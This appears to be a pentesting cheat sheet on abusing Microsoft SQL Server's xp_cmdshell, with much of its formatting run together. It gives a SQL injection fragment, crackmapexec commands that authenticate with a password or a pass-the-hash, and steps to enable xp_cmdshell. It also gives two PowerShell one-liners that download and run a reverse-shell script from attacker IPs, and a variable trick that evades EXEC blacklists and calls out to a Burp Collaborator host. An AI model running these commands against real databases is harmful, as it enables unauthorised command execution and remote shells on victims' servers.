Note that in order to be able to execute commands it's not only necessary to have xp_cmdshellenabled, but also have the EXECUTE permission on the xp_cmdshell stored procedure. You can get who (except sysadmins) can use xp_cmdshell with:
UsemasterEXEC sp_helprotect 'xp_cmdshell'
Check if current user is sysadmin
SELECT is_srvrolemember('sysadmin');
a' UNION all SELECT null,2; EXEC .....
# mssql account# Username +Password+ CMD commandcrackmapexec mssql -d <Domain name>-u <username>-p <password>-x "whoami"# Username +Hash+ PS commandcrackmapexec mssql -d <Domain name>-u <username>-H <HASH>-X '$PSVersionTable'# Checkif xp_cmdshell isenabledSELECT * FROM sys.configurations WHERE name='xp_cmdshell';# This turns on advanced options andis needed to configure xp_cmdshellsp_configure 'show advanced options', '1'RECONFIGURE#This enables xp_cmdshellsp_configure 'xp_cmdshell', '1'RECONFIGURE#One linerEXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; sp_configure 'xp_cmdshell', 1; RECONFIGURE;# Quickly check what the service account is via xp_cmdshellEXEC master..xp_cmdshell 'whoami'# Get Rev shellEXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://192.168.119.129:8000/rev.ps1") | powershell -noprofile'orEXEC xp_cmdshell 'powershell -c IEX(New-Object Net.WebClient).DownloadString(''http://192.168.119.173/rev.ps1'')'--# trymaster..xp_cmdshell# Bypass blackisted "EXEC xp_cmdshell"'; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' —
